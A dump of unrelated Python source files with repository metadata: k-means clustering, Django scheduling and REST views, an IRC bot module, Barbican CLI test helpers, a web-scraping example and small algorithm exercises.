# Black = coopS, red = coop1, green = coop2.
pylab.plot(coopS, 'k')
pylab.plot(coop1, 'r')
pylab.plot(coop2, 'g')
pylab.show()
|
[
"cdengcnc@sjtu.edu.cn"
] |
cdengcnc@sjtu.edu.cn
|
4b6cbd25b8649a1363aba2a0743f9bef3b0bf588
|
6b6bd222658ab11b51afc27d507abf4ef7d8e57b
|
/chapter6/kmeans.py
|
72b173ecb14ac98ea75d4c245148844914a34c87
|
[] |
no_license
|
JessicaFeng0926/classic_computer_science_problems
|
2347851f051e6e2afb2340258d5bf2d0a20e1571
|
68e44f4569a774553b763685050101357124d4a5
|
refs/heads/master
| 2022-11-13T16:29:45.396010
| 2020-07-08T02:11:04
| 2020-07-08T02:11:04
| 274,041,806
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,792
|
py
|
from __future__ import annotations
from typing import TypeVar, Generic, List, Sequence, Optional
from copy import deepcopy
from functools import partial
from random import uniform
from statistics import mean, pstdev
from dataclasses import dataclass
from data_point import DataPoint
def zscores(original: Sequence[float]) -> List[float]:
    """Standardize *original*: subtract the mean, divide by the population
    standard deviation. A zero-variance sequence maps to all zeros rather
    than dividing by zero."""
    center: float = mean(original)
    spread: float = pstdev(original)
    if spread == 0:
        return [0 for _ in original]
    return [(value - center) / spread for value in original]
Point = TypeVar('Point', bound=DataPoint)
class KMeans(Generic[Point]):
    """k-means clustering over z-score-normalized data points."""

    def __init__(self, k: int, points: List[Point], initial_centroids: Optional[List[Point]]=None) -> None:
        # The number of clusters must be positive (neither zero nor negative).
        if k<1 :
            raise ValueError('k must be >= 1')
        self._points: List[Point] = points
        self._zscore_normalize()
        # Initialize empty clusters.
        self._clusters: List[KMeans.Cluster] = []
        if initial_centroids is None:
            for _ in range(k):
                # Pick a random centroid.
                rand_point: DataPoint = self._random_point()
                # Seed a cluster around this random centroid; for now the
                # cluster has a centroid but no member points.
                cluster: KMeans.Cluster = KMeans.Cluster([],rand_point)
                self._clusters.append(cluster)
        else:
            if len(initial_centroids) != k:
                raise ValueError('The number of centroids must be k')
            for i in range(k):
                # Use the caller-supplied centroid.
                centroid: DataPoint = initial_centroids[i]
                # Seed a cluster around this centroid; for now the cluster
                # has a centroid but no member points.
                cluster: KMeans.Cluster = KMeans.Cluster([],centroid)
                self._clusters.append(cluster)

    @property
    def _centroids(self) -> List[DataPoint]:
        # Current centroid of every cluster, in cluster order.
        return [x.centroid for x in self._clusters]

    def _dimension_slice(self,dimension: int) -> List[float]:
        # Every point's value along one dimension.
        return [x.dimensions[dimension] for x in self._points]

    def _zscore_normalize(self) -> None:
        # Replace each point's coordinates with their per-dimension z-scores.
        zscored: List[List[float]] = [[] for _ in range(len(self._points))]
        for dimension in range(self._points[0].num_dimensions):
            dimension_slice: List[float] = self._dimension_slice(dimension)
            for index, zscore in enumerate(zscores(dimension_slice)):
                zscored[index].append(zscore)
        for i in range(len(self._points)):
            self._points[i].dimensions = tuple(zscored[i])

    def _random_point(self) -> DataPoint:
        '''Build a random point whose value in each dimension is drawn
        uniformly from that dimension's observed range over all points.'''
        rand_dimensions: List[float] = []
        for dimension in range(self._points[0].num_dimensions):
            values: List[float] = self._dimension_slice(dimension)
            rand_value: float = uniform(min(values),max(values))
            rand_dimensions.append(rand_value)
        return DataPoint(rand_dimensions)

    def _assign_clusters(self) -> None:
        '''Assign each data point to the cluster whose centroid is nearest.'''
        for point in self._points:
            closest: DataPoint = min(self._centroids,
                                     key=partial(DataPoint.distance,point))
            idx: int = self._centroids.index(closest)
            cluster: KMeans.Cluster = self._clusters[idx]
            cluster.points.append(point)

    def _generate_centroids(self) -> None:
        '''Recompute each cluster's centroid as the mean of its members.'''
        for cluster in self._clusters:
            # Leave a cluster untouched while it has no member points.
            if len(cluster.points) == 0:
                continue
            # Per-dimension means over all member points.
            means: List[float] = []
            for dimension in range(cluster.points[0].num_dimensions):
                dimension_slice: List[float] = [p.dimensions[dimension] for p in cluster.points]
                means.append(mean(dimension_slice))
            # The new centroid is the point built from those means.
            cluster.centroid = DataPoint(means)

    def run(self,max_iterations:int = 100) -> List[KMeans.Cluster]:
        """Run Lloyd's iterations until the centroids stop moving or
        max_iterations is reached; return the final clusters."""
        for iteration in range(max_iterations):
            for cluster in self._clusters:
                # Clear each cluster's membership from the previous round.
                cluster.points.clear()
            # Re-assign every point to its nearest centroid.
            self._assign_clusters()
            # Remember the current centroids.
            old_centroids: List[DataPoint] = deepcopy(self._centroids)
            # Compute new centroids.
            self._generate_centroids()
            # If the centroids did not move between rounds, the clustering
            # has converged; the current clusters are final.
            if old_centroids == self._centroids:
                print(f'Converged after {iteration} iterations')
                return self._clusters
        # Iterations exhausted; return the clusters as they stand.
        return self._clusters

    @dataclass
    class Cluster:
        """A cluster: its member points and current centroid."""
        points: List[Point]
        centroid: DataPoint
centroid: DataPoint
if __name__ == '__main__':
point1: DataPoint = DataPoint([2.0,1.0,1.0])
point2: DataPoint = DataPoint([2.0,2.0,5.0])
point3: DataPoint = DataPoint([3.0,1.5,2.5])
kmeans_test: KMeans[DataPoint] = KMeans(2, [point1,point2,point3])
test_clusters: List[KMeans.Cluster] = kmeans_test.run()
for index, cluster in enumerate(test_clusters):
print(f'Cluster {index}: {cluster.points}')
|
[
"hasayake.hi@163.com"
] |
hasayake.hi@163.com
|
71cfbf8a60c7c3ba6f029a3dbb93bebf0062f36d
|
99a83749bc5976d78acb2eaa43139662a52629d4
|
/msked/placements/utils_old.py
|
73ea061533d9d83cf90c722c21b3c623905a9774
|
[] |
no_license
|
tommydangerous/msked
|
16856ca484a98f0aa5785bc37355c33b436c6c37
|
681f48c386da17da64abbb24565efcce4cc0f10d
|
refs/heads/master
| 2020-04-16T15:15:57.992175
| 2013-11-07T06:37:16
| 2013-11-07T06:37:16
| 8,272,061
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,445
|
py
|
from collections import defaultdict
from django.conf import settings
from django.db.models import Q
from employees.models import Employee
from employees.utils import tier_lab_sum, tier_lab_balance_check
from random import shuffle
from tasks.utils import task_check
from undos.models import Undo
from works.utils import work_check
def set_placements(schedule):
employees = list(schedule.employees())
# the tier lab sum of all employees
total_tier = sum([e.tier_lab for e in employees])
# work locations for this schedule
locations = sorted(schedule.locations(),
key=lambda l: l.occupancy, reverse=True)
# create dictionary with empty list for each location
location_dict = defaultdict(list)
for location in locations:
location_dict[location] = []
# if schedule has at least 1 location with an occupancy number
if locations and locations[0].occupancy:
first_loc = locations[0]
second_loc = locations[1]
# separate location exclusive employees
exl_emp = first_loc.exclusive_employees()
exl_pks = [e.pk for e in exl_emp]
employees = [e for e in employees if e.pk not in exl_pks]
# minimum tier level required for first work location
min_tier = first_loc.occupancy/float(len(employees)) * total_tier
loop_counter = 0
loop_max = settings.LOOP_MAX
work_check(schedule)
# keep shuffling until the tier levels are balanced in all locations
# or until the script has looped over itself 1000 times
while not location_dict[first_loc] and loop_counter < loop_max:
shuffle(employees)
needed = first_loc.occupancy - len(exl_emp)
first_emp = employees[:needed]
second_emp = employees[needed:]
temp = task_check(schedule, first_emp, second_emp)
if temp:
location_dict[first_loc] = temp[0] + exl_emp
location_dict[second_loc] = temp[1]
else:
loop_counter = loop_max
break
loop_counter += 1
print 'Set placement loop counter: %s' % loop_counter
if loop_counter < loop_max:
for location in locations:
for employee in location_dict[location]:
# create employee placements for location
employee.placement_set.create(location=location)
Undo.objects.create(location=location)
return loop_counter
else:
return False
def switch_placements(schedule):
all_employees = Employee.objects.exclude(vacation=True)
excludes = schedule.exclude_set.all()
if excludes:
# exclude employees on certain teams
for exclude in excludes:
all_employees = all_employees.exclude(team=exclude.team)
all_employees = list(all_employees)
# work locations for this schedule
locations = sorted(schedule.locations(),
key=lambda l: l.occupancy, reverse=True)
if len(locations) >= 2:
# check to see if employees are placed at both locations
first_loc = locations[0]
second_loc = locations[1]
if not first_loc.current_employees() and not (
second_loc.current_employees()):
return set_placements(schedule)
else:
# create dictionary with empty list for each location
location_dict = defaultdict(list)
# previous location dictionary
prev_dict = defaultdict(list)
for location in locations:
location_dict[location] = []
# store the location's previous employees
prev_dict[location] = (
[e for e in location.current_employees() if not (
e.vacation)])
employees = prev_dict[first_loc] + prev_dict[second_loc]
# check to see if any employees came back from vacation
new_extra = [e for e in all_employees if e not in employees]
# the tier lab sum of all employees
total_tier = sum([e.tier_lab for e in employees])
for employee in new_extra:
if employee.current_location():
# place them at their last worked location
prev_dict[employee.current_location].append(employee)
else:
# place them in the second location
prev_dict[second_loc].append(employee)
if first_loc.occupancy:
# minimum tier level required for first work location
min_tier = first_loc.occupancy/float(len(
employees)) * total_tier
loop_counter = 0
loop_max = settings.LOOP_MAX
# check to see if there are enough employees left to
# work at each job for the week
work_check(schedule)
# separate location exclusive employees
exl_emp = first_loc.exclusive_employees()
exl_pks = [e.pk for e in exl_emp]
while not location_dict[first_loc] and loop_counter < loop_max:
prev_femp = prev_dict[first_loc]
prev_femp = [e for e in prev_femp if e.pk not in exl_pks]
prev_semp = prev_dict[second_loc]
temp = task_check(schedule, prev_femp, prev_semp)
if temp:
location_dict[first_loc] = temp[0] + exl_emp
location_dict[second_loc] = temp[1]
else:
loop_counter = loop_max
break
loop_counter += 1
print 'Switch placement loop counter: %s' % loop_counter
if loop_counter < loop_max:
for location in locations:
for employee in location_dict[location]:
# create employee placements for location
employee.placement_set.create(location=location)
Undo.objects.create(location=location)
return loop_counter
else:
return False
|
[
"quantumventuress@gmail.com"
] |
quantumventuress@gmail.com
|
c484c984aa678a25c17ee8984e4c160b9abfbc25
|
feea5b7e71dbcc491dc9fe9b1686b5c13949369e
|
/mods/channels/__init__.py
|
21139372dfe1438fafc7a060196c47bd3261c615
|
[] |
no_license
|
IsmaelRLG/UserBot
|
232660971f98db1838263f821f40f0c879f00030
|
1ed21d0c0274c022b0de66ecc48547d9dab8be2b
|
refs/heads/master
| 2021-01-17T07:08:13.342496
| 2016-03-11T19:08:30
| 2016-03-11T19:08:30
| 39,799,613
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,260
|
py
|
# -*- coding: utf-8 -*-
"""
UserBot module
Copyright 2015, Ismael R. Lugo G.
"""
import channels
reload(channels)
from sysb import commands
from channels import lang
from channels import _
commands.addHandler('channels', 'chan register( (?P<channel>[^ ]+))?', {
'sintax': 'chan register <channel>?',
'example': 'chan register #Foo',
'desc': _('registra un canal en el bot', lang)},
registered=True,
logged=True,
channels=True,
chan_reqs='channel')(channels.register)
commands.addHandler('channels', 'chan flags( (?P<channel>#[^ ]+))? (?P<target>['
'^ ]+) (?P<flags>[^ ]+)', {
'sintax': 'chan flags <channel>? <target> <flags>',
'example': 'chan flags #Foo-chan foo-user OP',
'desc': _('(añade / elimina / edita / muestra) los flags', lang)},
registered=True,
logged=True,
channels=True,
chn_registered=True,
privs='s',
chan_reqs='channel')(channels.flags)
commands.addHandler('channels', 'chan drop( (?P<channel>#[^ ]+))?', {
'sintax': 'chan drop <channel>?',
'example': 'chan drop #foo',
'desc': _('elimina un canal del bot', lang)},
registered=True,
logged=True,
channels=True,
chn_registered=True,
privs='F',
chan_reqs='channel')(channels.drop)
|
[
"ismaelrlgv@gmail.com"
] |
ismaelrlgv@gmail.com
|
42262be31f9c9c5961d6f718490d0a8e36264f3f
|
52f8ac63714421e1930d7b90cb8200bb24d6ac42
|
/milove/shop/migrations/0011_auto_20170914_1954.py
|
a24d6b8e68833b9780ce5f3322a7f656ff9f7926
|
[] |
no_license
|
richardchien/milove-backend
|
ccc7afa17e88b17199ad3878b9315e12c2af8ef1
|
0310f2a60ebcbc3143d0aedcc6cb5842ba264a43
|
refs/heads/master
| 2023-07-06T12:45:13.622032
| 2017-10-02T04:40:00
| 2017-10-02T04:40:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 876
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-09-14 11:54
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('shop', '0010_auto_20170911_1831'),
]
operations = [
migrations.AddField(
model_name='payment',
name='type',
field=models.CharField(choices=[('standard', 'PaymentType|standard'), ('recharge', 'PaymentType|recharge')], default='standard', max_length=20, verbose_name='type'),
),
migrations.AlterField(
model_name='payment',
name='order',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='payments', to='shop.Order', verbose_name='order'),
),
]
|
[
"richardchienthebest@gmail.com"
] |
richardchienthebest@gmail.com
|
d2ff44c7f4f8ddc697ff528d785f404eda63cd11
|
64c8d431c751b1b7a7cb7224107ee40f67fbc982
|
/code/python/echomesh/base/Path.py
|
f72ecbc1483d9983735ec38c6681592f9d32e01b
|
[
"MIT"
] |
permissive
|
silky/echomesh
|
6ac4755e4ff5ea3aa2b2b671c0979068c7605116
|
2fe5a00a79c215b4aca4083e5252fcdcbd0507aa
|
refs/heads/master
| 2021-01-12T20:26:59.294649
| 2013-11-16T23:29:05
| 2013-11-16T23:29:05
| 14,458,268
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,625
|
py
|
from __future__ import absolute_import, division, print_function, unicode_literals
from echomesh.base import MakeEmptyProject
from echomesh.base import Platform
import getpass
import os
import os.path
import sys
ECHOMESH_EXTERNALS_OVERRIDE_SYSTEM_PACKAGES = True
# If this is True, you want Echomesh to use its own external packages in
# preference to any you might have installed in your system path.
CODE_PATH = os.path.abspath(sys.path[0])
EXTERNAL_CODE_PATH = os.path.join(CODE_PATH, 'external')
ECHOMESH_PATH = os.path.dirname(os.path.dirname(CODE_PATH))
BINARY_PATH = os.path.join(ECHOMESH_PATH, 'bin', Platform.PLATFORM)
PROJECT_PATH = None
COMMAND_PATH = None
ASSET_PATH = None
_REQUIRED_DIRECTORIES = 'asset', 'cache', 'command', 'log'
def _possible_project(path):
for d in _REQUIRED_DIRECTORIES:
if not os.path.exists(os.path.join(path, d)):
return False
return True
def set_project_path(project_path=None, show_error=True, prompt=True):
original_path = os.path.abspath(os.path.expanduser(project_path or os.curdir))
path = original_path
global PROJECT_PATH, COMMAND_PATH, ASSET_PATH
while not _possible_project(path):
p = os.path.dirname(path)
if p != path:
path = p
continue
if prompt:
if MakeEmptyProject.ask_to_make_empty_project(original_path):
path = original_path
break
else:
PROJECT_PATH = None
return False
if show_error:
print("\nYour path %s isn't in an echomesh project." % original_path)
print("Defaulting to the echomesh path %s." % ECHOMESH_PATH)
path = ECHOMESH_PATH
break
PROJECT_PATH = path
COMMAND_PATH = os.path.join(path, 'command')
ASSET_PATH = os.path.join(path, 'asset')
os.chdir(path)
return True
set_project_path()
def info():
return {
'Asset path': ASSET_PATH,
'Code path': CODE_PATH,
'Command path': COMMAND_PATH,
'External code path': EXTERNAL_CODE_PATH,
'Project path': PROJECT_PATH,
'echomesh path': ECHOMESH_PATH,
}
def fix_sys_path():
for path in EXTERNAL_CODE_PATH, BINARY_PATH:
if path not in sys.path:
if ECHOMESH_EXTERNALS_OVERRIDE_SYSTEM_PACKAGES:
sys.path.insert(1, path)
else:
sys.path.append(path)
_HOME_VARIABLE_FIXED = False
# HACK!
def fix_home_directory_environment_variable():
if Platform.PLATFORM == Platform.DEBIAN:
global _HOME_VARIABLE_FIXED
if not _HOME_VARIABLE_FIXED:
# If running as root, export user pi's home directory as $HOME.
if getpass.getuser() == 'root':
os.environ['HOME'] = '/home/pi'
_HOME_VARIABLE_FIXED = True
|
[
"tom@swirly.com"
] |
tom@swirly.com
|
07ffac3ce1e2a9ef29d17775d50bc2c6979df431
|
3f6c16ea158a8fb4318b8f069156f1c8d5cff576
|
/.PyCharm2019.1/system/python_stubs/1707563220/resource.py
|
cfb221481b898c344ab21274ba2bd7f905e9409f
|
[] |
no_license
|
sarthak-patidar/dotfiles
|
08494170d2c0fedc0bbe719cc7c60263ce6fd095
|
b62cd46f3491fd3f50c704f0255730af682d1f80
|
refs/heads/master
| 2020-06-28T23:42:17.236273
| 2019-10-01T13:56:27
| 2019-10-01T13:56:27
| 200,369,900
| 0
| 0
| null | 2019-08-03T12:56:33
| 2019-08-03T11:53:29
|
Shell
|
UTF-8
|
Python
| false
| false
| 5,485
|
py
|
# encoding: utf-8
# module resource
# from /usr/lib/python3.6/lib-dynload/resource.cpython-36m-x86_64-linux-gnu.so
# by generator 1.147
# no doc
# no imports
# Variables with simple values
RLIMIT_AS = 9
RLIMIT_CORE = 4
RLIMIT_CPU = 0
RLIMIT_DATA = 2
RLIMIT_FSIZE = 1
RLIMIT_MEMLOCK = 8
RLIMIT_MSGQUEUE = 12
RLIMIT_NICE = 13
RLIMIT_NOFILE = 7
RLIMIT_NPROC = 6
RLIMIT_OFILE = 7
RLIMIT_RSS = 5
RLIMIT_RTPRIO = 14
RLIMIT_RTTIME = 15
RLIMIT_SIGPENDING = 11
RLIMIT_STACK = 3
RLIM_INFINITY = -1
RUSAGE_CHILDREN = -1
RUSAGE_SELF = 0
RUSAGE_THREAD = 1
# functions
def getpagesize(*args, **kwargs): # real signature unknown
pass
def getrlimit(*args, **kwargs): # real signature unknown
pass
def getrusage(*args, **kwargs): # real signature unknown
pass
def prlimit(*args, **kwargs): # real signature unknown
pass
def setrlimit(*args, **kwargs): # real signature unknown
pass
# classes
class error(Exception):
""" Base class for I/O related errors. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __reduce__(self, *args, **kwargs): # real signature unknown
pass
def __str__(self, *args, **kwargs): # real signature unknown
""" Return str(self). """
pass
characters_written = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
errno = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""POSIX exception code"""
filename = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""exception filename"""
filename2 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""second exception filename"""
strerror = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""exception strerror"""
class struct_rusage(tuple):
"""
struct_rusage: Result from getrusage.
This object may be accessed either as a tuple of
(utime,stime,maxrss,ixrss,idrss,isrss,minflt,majflt,
nswap,inblock,oublock,msgsnd,msgrcv,nsignals,nvcsw,nivcsw)
or via the attributes ru_utime, ru_stime, ru_maxrss, and so on.
"""
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __reduce__(self, *args, **kwargs): # real signature unknown
pass
def __repr__(self, *args, **kwargs): # real signature unknown
""" Return repr(self). """
pass
ru_idrss = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""unshared data size"""
ru_inblock = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""block input operations"""
ru_isrss = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""unshared stack size"""
ru_ixrss = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""shared memory size"""
ru_majflt = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""page faults requiring I/O"""
ru_maxrss = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""max. resident set size"""
ru_minflt = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""page faults not requiring I/O"""
ru_msgrcv = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""IPC messages received"""
ru_msgsnd = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""IPC messages sent"""
ru_nivcsw = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""involuntary context switches"""
ru_nsignals = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""signals received"""
ru_nswap = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""number of swap outs"""
ru_nvcsw = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""voluntary context switches"""
ru_oublock = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""block output operations"""
ru_stime = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""system time used"""
ru_utime = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""user time used"""
n_fields = 16
n_sequence_fields = 16
n_unnamed_fields = 0
# variables with complex values
__loader__ = None # (!) real value is '<_frozen_importlib_external.ExtensionFileLoader object at 0x7fdd7a975898>'
__spec__ = None # (!) real value is "ModuleSpec(name='resource', loader=<_frozen_importlib_external.ExtensionFileLoader object at 0x7fdd7a975898>, origin='/usr/lib/python3.6/lib-dynload/resource.cpython-36m-x86_64-linux-gnu.so')"
|
[
"sarthakpatidar15@gmail.com"
] |
sarthakpatidar15@gmail.com
|
38b4d90fe79dceeac78c45f1b1931845c7c16df1
|
f62fd455e593a7ad203a5c268e23129473d968b6
|
/python-barbicanclient-4.2.0/functionaltests/cli/v1/behaviors/secret_behaviors.py
|
783db8bcdceadd3bb8c49600d77926bb52b65eca
|
[
"Apache-2.0"
] |
permissive
|
MinbinGong/OpenStack-Ocata
|
5d17bcd47a46d48ff9e71e2055f667836174242f
|
8b7650128cfd2fdf5d6c8bc4613ac2e396fb2fb3
|
refs/heads/master
| 2021-06-23T05:24:37.799927
| 2017-08-14T04:33:05
| 2017-08-14T04:33:05
| 99,709,985
| 0
| 2
| null | 2020-07-22T22:06:22
| 2017-08-08T15:48:44
|
Python
|
UTF-8
|
Python
| false
| false
| 4,527
|
py
|
# Copyright (c) 2015 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import base_behaviors
class SecretBehaviors(base_behaviors.BaseBehaviors):
def __init__(self):
super(SecretBehaviors, self).__init__()
self.LOG = logging.getLogger(type(self).__name__)
self.secret_hrefs_to_delete = []
def update_secret(self,
secret_href,
payload):
"""Update a secret
:param secret_href the href to the secret to update.
:param payload the payload to put into the secret.
:param payload_content_type the payload content type.
"""
argv = ['secret', 'update']
self.add_auth_and_endpoint(argv)
argv.extend([secret_href])
argv.extend([payload])
stdout, stderr = self.issue_barbican_command(argv)
def delete_secret(self, secret_href):
"""Delete a secret
:param secret_href the href to the secret to delete
"""
argv = ['secret', 'delete']
self.add_auth_and_endpoint(argv)
argv.extend([secret_href])
stdout, stderr = self.issue_barbican_command(argv)
self.secret_hrefs_to_delete.remove(secret_href)
def store_secret(self, payload="Payload for testing", store_argv=[]):
"""Store (aka create) a secret
The store_argv parameter allows additional command line parameters for
the store operation to be specified. This can be used to specify -a for
algorithm as an example.
:param payload The payload to use when storing the secret
:param store_argv The store command line parameters
:return: the href to the newly created secret
"""
argv = ['secret', 'store']
self.add_auth_and_endpoint(argv)
argv.extend(['--payload', payload])
argv.extend(store_argv)
stdout, stderr = self.issue_barbican_command(argv)
secret_data = self._prettytable_to_dict(stdout)
secret_href = secret_data['Secret href']
self.secret_hrefs_to_delete.append(secret_href)
return secret_href
def get_secret(self, secret_href):
"""Get a secret
:param: the href to a secret
:return dict of secret values, or an empty dict if the secret
is not found.
"""
argv = ['secret', 'get']
self.add_auth_and_endpoint(argv)
argv.extend([secret_href])
stdout, stderr = self.issue_barbican_command(argv)
if '4xx Client error: Not Found' in stderr:
return {}
secret_data = self._prettytable_to_dict(stdout)
return secret_data
def get_secret_payload(self, secret_href, raw=False):
"""Get a secret
:param: the href to a secret
:param raw if True then add "-f value" to get raw payload (ie not
within a PrettyTable). If False then omit -f.
:return string representing the secret payload.
"""
argv = ['secret', 'get']
self.add_auth_and_endpoint(argv)
argv.extend([secret_href])
argv.extend(['--payload'])
if raw:
argv.extend(['-f', 'value'])
stdout, stderr = self.issue_barbican_command(argv)
if '4xx Client error: Not Found' in stderr:
return {}
if raw:
secret = stdout.rstrip()
else:
secret_data = self._prettytable_to_dict(stdout)
secret = secret_data['Payload']
return secret
def list_secrets(self):
"""List secrets
:return: a list of secrets
"""
argv = ['secret', 'list']
self.add_auth_and_endpoint(argv)
stdout, stderr = self.issue_barbican_command(argv)
secret_list = self._prettytable_to_list(stdout)
return secret_list
def delete_all_created_secrets(self):
"""Delete all secrets that we created"""
for href in self.secret_hrefs_to_delete:
self.delete_secret(href)
|
[
"gongwayne@hotmail.com"
] |
gongwayne@hotmail.com
|
63e3cad549c027b04f4f2aeabb6948e59f1936fe
|
15de7f67ac019324d99076906e7864e2b3d52218
|
/Part 3/Ch1.py
|
c6c9fd87d0c1035be6d4c4b6f26a3055489bf39b
|
[] |
no_license
|
ankiwoong/Web_Scraping_in_Python
|
df97aebc36b43d125f5d4ff55ab47cd114656c51
|
dcc0950ee7fb5e4b9acaec581a2fcd590d27bb4a
|
refs/heads/master
| 2022-12-03T07:58:38.626717
| 2020-08-30T02:37:13
| 2020-08-30T02:37:13
| 289,597,273
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 588
|
py
|
import mechanicalsoup
browser = mechanicalsoup.Browser()
# browser() 객체는 head가 없는 웹 브라우저를 나타낸다.
# URL을 .get() 메소드에 전달하여 인터넷에서 페이지를 요청할 수 있다.
url = "http://olympus.realpython.org/login"
page = browser.get(url)
# 출력
print(page)
# MechanicalSoup은 요청에서 HTML을 구문 분석하기 위해 Beautiful Soup을 사용한다.
# 페이지에는 BeautifulSoup 개체를 나타내는 .soup 속성이 있다
print(type(page.soup))
# .soup 속성을 검사하여 HTML을 볼 수 있다.
print(page.soup)
|
[
"ankiwoong@gmail.com"
] |
ankiwoong@gmail.com
|
0cce371b26cc503d2072a6754493cd4e3c5ce7cb
|
4749d3cf395522d90cb74d1842087d2f5671fa87
|
/alice/LC686.py
|
67bed14402b09716dbc8ef161fcd6f9c04fb99e2
|
[] |
no_license
|
AliceTTXu/LeetCode
|
c1ad763c3fa229362350ce3227498dfb1f022ab0
|
ed15eb27936b39980d4cb5fb61cd937ec7ddcb6a
|
refs/heads/master
| 2021-01-23T11:49:49.903285
| 2018-08-03T06:00:16
| 2018-08-03T06:00:16
| 33,470,003
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 625
|
py
|
class Solution(object):
def repeatedStringMatch(self, A, B):
"""
:type A: str
:type B: str
:rtype: int
"""
temp_out = len(B) / len(A)
end = self.find_substring_ending(A * (temp_out + 2), B)
if end == -1:
return -1
else:
return temp_out + ((end + 1) - len(A) * temp_out) / len(A) + (((end + 1) - len(A) * temp_out) % len(A) > 0)
def find_substring_ending(self, A, B):
for i in xrange(len(A) - len(B) + 1):
if A[i:i + len(B)] == B:
return i + len(B) - 1
return -1
|
[
"aliceadelice@gmail.com"
] |
aliceadelice@gmail.com
|
3bcdcd1ec3d8551f1937844d1b5049ba7f40e0de
|
21bbcc4898cc653d2a81b91f500293f7e6932fc8
|
/users/views/bet.py
|
44bac74410fd01c5813a9e733895dec785afbeca
|
[] |
no_license
|
ewgen19892/auction
|
7e116354008349bbde147b42ee1a909cac7fc00b
|
1449156a4985ca7757e342613e0762e11ed9aa30
|
refs/heads/master
| 2023-05-31T23:02:14.539923
| 2021-06-30T13:21:13
| 2021-06-30T13:21:13
| 381,708,643
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,256
|
py
|
"""Bets views."""
from rest_framework.generics import GenericAPIView
from rest_framework.mixins import (
CreateModelMixin,
ListModelMixin,
RetrieveModelMixin,
)
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from users.models.bet import Bet
from users.serializers.bet import BetSerializer
class BetList(GenericAPIView, ListModelMixin, CreateModelMixin):
"""Bet list view."""
queryset = Bet.objects.all()
serializer_class = BetSerializer
permission_classes = (IsAuthenticated,)
def get(self, request, *args, **kwargs) -> Response:
"""
Get Bets list.
"""
return self.list(request, *args, **kwargs)
def post(self, request, *args, **kwargs) -> Response:
"""
Create a new bet.
"""
return self.create(request, *args, **kwargs)
class BetDetail(
GenericAPIView,
RetrieveModelMixin,
):
"""Bet detail view."""
serializer_class = BetSerializer
queryset = Bet.objects.all()
permission_classes = (IsAuthenticated,)
def get(self, request, *args, **kwargs) -> Response:
"""
Get bet by ID.
"""
return self.retrieve(request, *args, **kwargs)
|
[
"e.bohovchuk@admitad.com"
] |
e.bohovchuk@admitad.com
|
5b3f7af6254318f0492a9a4656e243ea1a650008
|
18f776553a59a89faf05144ed1a69dc563dc4e9e
|
/Algorithm/insert_sort.py
|
cbdb6501102014039571662e8f5b9136479ee6a9
|
[] |
no_license
|
g-lyc/LeetCode
|
274feff3b6c61da0ec8726deac0b298baed5cf10
|
fa45cd44c3d4e7b0205833efcdc708d1638cbbe4
|
refs/heads/master
| 2022-12-13T14:50:02.976951
| 2020-09-03T09:39:58
| 2020-09-03T09:39:58
| 259,212,315
| 15
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 706
|
py
|
# coding:utf-8
def insert_sort(alist):
"""插入排序"""
n = len(alist)
# 从右边的无序序列中取出多少个元素执行这样的过程
for j in range(1, n):
# j = [1, 2, 3, n-1]
# i 代表内层循环起始值
i = j
# 执行从右边的无序序列中取出第一个元素,即i位置的元素,然后将其插入到前面的正确位置中
while i > 0:
if alist[i] < alist[i-1]:
alist[i], alist[i-1] = alist[i-1], alist[i]
i -= 1
else:
break
if __name__ == "__main__":
li = [54, 26, 93, 17, 77, 31, 44, 55, 20]
print(li)
insert_sort(li)
print(li)
|
[
"309080979@qq.com"
] |
309080979@qq.com
|
6aca02bb5efcef065a9dbd7d46d07f6bb6937bf1
|
76e8afe527e191e6291562c6140606c16d7385df
